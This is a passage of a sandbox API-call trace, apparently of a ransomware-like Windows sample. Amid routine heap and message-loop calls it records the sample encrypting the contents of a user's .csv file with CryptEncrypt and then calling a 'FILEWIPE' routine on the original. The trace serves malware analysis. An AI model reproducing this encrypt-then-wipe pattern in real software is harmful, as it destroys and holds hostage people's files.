hHeap=0x8a0000) returned 1 [0172.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0172.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0172.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0172.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0172.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0172.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0172.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0172.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0172.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0172.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0172.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0172.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0172.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0172.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0172.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0172.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0172.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0172.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0172.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0172.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0172.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0172.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0172.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0172.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0172.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0172.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0172.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0172.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0172.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0172.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0172.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0172.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0172.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0172.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0172.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0172.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0172.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0172.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0172.528] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0172.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0172.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0172.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0172.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0172.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0172.528] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0172.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0172.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0172.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0172.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0172.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0172.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0172.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0172.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0172.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0172.528] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.529] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.530] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.530] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.530] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.530] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.530] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0172.530] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.530] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.530] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0172.530] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.530] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.530] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0172.530] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0172.530] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0172.530] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.530] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.530] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.530] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.530] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.530] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.531] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0172.533] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.533] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x8295, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x82a0) returned 1 [0172.533] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.533] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.533] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.533] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.533] CharLowerBuffW (in: lpsz="byte[33441]", cchLength=0xb | out: lpsz="byte[33441]") returned 0xb [0172.533] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.536] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.536] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.536] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0172.536] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.536] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9c5180*, pdwDataLen=0x87e820*=0x8295, dwBufLen=0x82a0 | out: pbData=0x9c5180*, pdwDataLen=0x87e820*=0x82a0) returned 1 [0172.537] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.537] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.537] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.539] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.539] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.539] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.539] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0172.539] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.539] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0172.539] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0172.539] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0172.539] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.539] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.540] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0172.540] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.540] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.540] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.545] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.545] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.545] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.551] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.551] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.551] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0172.551] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0172.551] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.551] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0172.551] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.551] CryptDestroyKey (hKey=0x90af98) returned 1 [0172.551] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0172.552] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0172.552] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0172.552] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0172.552] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0172.552] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0172.552] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0172.552] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0172.552] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.552] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0172.552] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0172.552] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0172.552] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0172.552] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0172.552] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.552] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0172.552] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.552] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0172.552] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.552] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.553] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.553] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.553] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0172.553] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.553] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.553] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0172.553] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0172.553] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0172.563] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.563] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0172.563] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.563] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.563] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0172.564] FreeLibrary (hLibModule=0x74f20000) returned 1 [0172.564] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.564] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.564] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.564] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.565] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.568] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.568] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0172.569] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.569] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.569] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdb77400, ftCreationTime.dwHighDateTime=0x1d5e64d, ftLastAccessTime.dwLowDateTime=0x363ae3c0, ftLastAccessTime.dwHighDateTime=0x1d5dedf, ftLastWriteTime.dwLowDateTime=0x363ae3c0, ftLastWriteTime.dwHighDateTime=0x1d5dedf, nFileSizeHigh=0x0, nFileSizeLow=0x8295, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="mo9b RC5.csv", cAlternateFileName="MO9BRC~1.CSV")) returned 0x90af58 [0172.569] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0172.570] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.570] CharLowerBuffW (in: lpsz="byte[33429]", cchLength=0xb | out: lpsz="byte[33429]") returned 0xb [0172.571] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.571] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0172.571] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.571] CharLowerBuffW (in: lpsz="ptr:cdecl", 